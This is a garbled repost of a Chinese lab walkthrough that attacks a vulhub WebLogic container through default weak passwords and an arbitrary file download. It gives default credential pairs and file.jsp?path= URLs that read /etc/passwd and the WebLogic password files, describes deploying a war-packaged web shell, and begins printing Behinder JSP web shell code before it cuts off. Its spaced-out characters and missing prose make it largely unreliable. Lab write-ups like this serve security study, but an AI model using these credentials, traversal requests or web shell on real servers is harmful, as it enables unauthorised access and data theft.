[15759] 2020-08-22_JBass弱口令及任意文件下载漏洞分析

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-18
2020-08-22_JBass弱口令及任意文件下载漏洞分析 J B a s s h f y n 1 2 3   F r e e B u f   2 0 2 0 - 0 8 - 2 2 J B a s s v u l h u b s u d o   g i t   c l o n e   h t t p s : / / g i t h u b . c o m / v u l h u b / v u l h u b . g i t v u l h u b d o c k e r - c o m p o s e v u l h u b v u l h u b v u l h u b d o c k e r - c o m p o s e d o c k e r - c o m p o s e s u d o   a p t   i n s t a l l   d o c k e r - c o m p o s e d o c k e r - c o m p o s e v u l h u b v u l h u b / w e b l o g i c w e a k _ p a s s w o r d w e a k _ p a s s w o r d s u d o   d o c k e r - c o m p o s e   b u i l d d o c k e r - c o m p o s e . y m l d o c k e r - c o m p o s e . y m l d o c k e r - c o m p o s e . y m l d o c k e r - c o m p o s e   u p   - d 使 s u d o   d o c k e r   p s d o c k e r w e b l o g i c 7 0 0 1 u r l / c o n s o l e / l o g i n / W e b l o g i c U s e r   I D P a s s w o r d s y s t e m p a s s w o r d a d m i n s e c u r i t y j o e p a s s w o r d m a r y p a s s w o r d s y s t e m s e c u r i t y
w l c s y s t e m w l c s y s t e m w l p i s y s t e m w l p i s y s t e m w e b l o g i c O r a c l e @ 1 2 3 U s e r   I D P a s s w o r d O r a c l e 1 2 3   | w e b l o g i c 使 A E S A E S / W e b l o g i c / r o o t / O r a c l e / M i d d l e w a r e / u s e r _ p r o j e c t s / d o m a i n s / b a s e _ d o m a i n . / s e c u r i t y / S e r i a l i z e d S y s t e m I n i . d a t   . / c o n f i g / c o n f i g . x m l   v u l h u b 访 / e t c / p a s s w d h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 1 2 : 7 0 0 1 / h e l l o / f i l e . j s p ? p a t h = / e t c / p a s s w d S e r i a l i z e d S y s t e m I n i . d a t   h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 1 2 : 7 0 0 1 / h e l l o / f i l e . j s p ? p a t h = / r o o t / O r a c l e / M i d d l e w a r e / u s e r _ p r o j e c t s / d o m a i n s / b a s e _ d o m a i n / c o n f i g / c o n f i g . x m l - / / 1 9 2 . 1 6 8 . 1 . 1 1 2 : 7 0 0 1 / h e l l o / f i l e . j s p ? p a t h = / r o o t / O r a c l e / M i d d l e w a r e / u s e r _ p r o j e c t s / d o m a i n s / b a s e _ d o m a i n / s e c u r i t y / S e r i a l i z e d S y s t e m I n i . d a t
使 w e b l o g i c   O r a c l e @ 1 2 3 h t t p s : / / g i t h u b . c o m / T i d e S e c / D e c r y p t _ W e b l o g i c _ P a s s w o r d w e b _ S h e l l z i p w a r
:
访 s h e l l + j s p h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 1 2 : 7 0 0 1 / b q 2 / b q s h e l l . j s p 使 s h e l l U b u n t u s h e l l s h e l l w i n d o w s U T F - 8 U b u n t u Z I P w a r
j s p u t f - 8 j s p h t t p s : / / g i t h u b . c o m / r e b e y o n d / B e h i n d e r / r e l e a s e s j s p 3 6 0 < % @ p a g e   i m p o r t = " j a v a . u t i l . * , j a v a x . c r y p t o . * , j a v a x . c r y p t o . s p e c . * " % > < % ! c l a s s   U   e x t e n d u 0 0 7 3   C l a s s L o a d e r { U ( C l a s s L o a d e r   c ) { s u p e r ( c ) ; } p u b l i c   C l a s s   g ( b y t e   [ ] b ) { r e t u r n   s u p e r . d e f i n e C l a s s ( b ,

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则